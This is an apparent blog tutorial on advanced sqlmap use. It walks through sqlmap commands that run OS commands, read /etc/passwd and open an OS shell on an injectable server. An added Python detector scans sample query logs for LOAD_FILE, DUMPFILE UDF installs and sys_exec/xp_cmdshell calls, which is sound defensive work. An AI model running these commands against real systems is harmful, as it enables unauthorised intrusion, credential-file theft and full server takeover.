We have learnt the basics of exploiting SQL Injection with Sqlmap in our previous posts, but there is always a step further. In this post we will see more advanced exploitation with Sqlmap.
Once again, three cheers to Kunal for helping me out with this post.
In our first Sqlmap post we explained a few basic options of Sqlmap. We will see some more here.
Advanced Exploitation with Sqlmap
Whenever I meet people and talk about any vulnerability, my first and final question remains the same: what is the most extreme thing we can do by exploiting that vulnerability? In the case of SQL Injection most of my peers don't discuss anything beyond downloading or altering the database. But we can go beyond that and take complete control of the application with the help of a shell: we can run OS commands, upload a file, read an existing file and more.
Advanced Options of Sqlmap
Operating System Level Access:
| Switch | Details |
| --- | --- |
| --os-cmd=OSCMD | Run operating system level commands |
| --os-shell | Invoke an interactive shell for communication |
| --os-pwn | Inject a Meterpreter shell or VNC |
| --os-smbrelay | One click prompt for an OOB shell, Meterpreter or VNC |
| --os-bof | Stored procedure buffer overflow exploitation |
| --priv-esc | Database process' user privilege escalation |
| --msf-path=MSFPATH | Local path where Metasploit Framework 3 is installed |
File System Level Access:
These options are used to access the underlying file system of the database server.
| Switch | Details |
| --- | --- |
| --file-read=RFILE | Read a file from the back-end DBMS file system |
| --file-write=WFILE | Write a local file on the back-end DBMS file system |
| --file-dest=DFILE | Back-end DBMS absolute filepath to write to |
Windows Registry Access:
| Switch | Details |
| --- | --- |
| --reg-read | Read a Windows registry key value |
| --reg-add | Write a Windows registry key value data |
| --reg-del | Delete a Windows registry key value |
| --reg-key=REGKEY | Windows registry key |
| --reg-value=REGVAL | Windows registry key value |
| --reg-data=REGDATA | Windows registry key value data |
| --reg-type=REGTYPE | Windows registry key value type |
We will see the practical use of a few of the above options. Let's start by running the commands below.
sqlmap -r sql.txt -p item --os-cmd=ls
sqlmap -r sql.txt -p item --os-cmd=ifconfig
Let’s see if we can read any file on the server.
sqlmap -r sql.txt -p item --file-read=/etc/passwd
Now we will read the file.
This looks great! What next? Maybe the shell.
sqlmap -r sql.txt -p item --os-shell
So you own the machine now. If you remember, we discussed keeping the hash values for further attacks. Let's try that as well. As you can see, the hashes have been cracked.
So, in this Sqlmap series we have learnt about everything from basic exploitation to advanced system takeover.
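From the defender's side, the switches above leave a recognisable trail in the database query log. As an added example that is not from the original post, the Python script below scans constructed MySQL general-query-log lines for the primitives those switches rely on (LOAD_FILE() behind --file-read, INTO OUTFILE/DUMPFILE behind --file-write, the CREATE FUNCTION ... SONAME plus sys_exec() UDF route, or xp_cmdshell on MSSQL, behind --os-cmd/--os-shell) and reports connections where the whole command-execution chain appears in order. The log lines, library file name and connection ids are constructed, and the labels are my own.

```python
import re
from collections import defaultdict

# Constructed sample in MySQL general-query-log style; not a real capture.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z 12 Query SELECT name, price FROM items WHERE id = 7
2024-01-01T10:00:02Z 12 Query SELECT name, price FROM items WHERE id = 7 AND 1=2 UNION ALL SELECT NULL, LOAD_FILE('/etc/passwd')
2024-01-01T10:00:03Z 12 Query SELECT 0x7f454c46 INTO DUMPFILE '/usr/lib/mysql/plugin/libsqlmapudf.so'
2024-01-01T10:00:04Z 12 Query CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudf.so'
2024-01-01T10:00:05Z 12 Query SELECT sys_exec('ifconfig')
2024-01-01T10:00:06Z 13 Query SELECT COUNT(*) FROM orders WHERE user_id = 42
"""

# Each sqlmap switch from the tables above, mapped to the SQL primitive it
# depends on (MySQL unless noted). The labels are ours, not sqlmap's.
PRIMITIVES = [
    ("--file-read",  re.compile(r"\bLOAD_FILE\s*\(", re.I)),
    ("--file-write", re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.I)),
    ("udf-install",  re.compile(r"\bCREATE\s+FUNCTION\b.*\bSONAME\b", re.I)),
    ("--os-cmd",     re.compile(r"\bsys_(?:exec|eval)\s*\(|\bxp_cmdshell\b", re.I)),
]
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")

def classify(sql):
    """Return the label of every primitive present in one statement."""
    return [label for label, rx in PRIMITIVES if rx.search(sql)]

def scan(log_text):
    """Return (connection_id, label, sql) for every flagged statement, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not Query records
        for label in classify(m["sql"]):
            hits.append((int(m["conn"]), label, m["sql"]))
    return hits

def udf_chains(hits):
    """Connections showing the full --os-cmd setup: file write, then
    CREATE FUNCTION ... SONAME, then a call to the installed function."""
    stages = defaultdict(list)
    for conn, label, _ in hits:
        stages[conn].append(label)
    wanted = ["--file-write", "udf-install", "--os-cmd"]
    chained = []
    for conn, labels in stages.items():
        pos = 0
        for label in labels:  # ordered subsequence match
            if pos < len(wanted) and label == wanted[pos]:
                pos += 1
        if pos == len(wanted):
            chained.append(conn)
    return chained

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for conn, label, sql in found:
        print(f"conn {conn}: {label}: {sql[:60]}")
    print("UDF command-execution chain on connections:", udf_chains(found))
```

In production the same regexes can run over the general log, audit plugin output or a query-level proxy; on a hardened MySQL host, secure_file_priv and the absence of the FILE privilege should make the first two stages fail before the third is ever attempted.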
Do drop your valuable suggestions and feedback.
great explanation!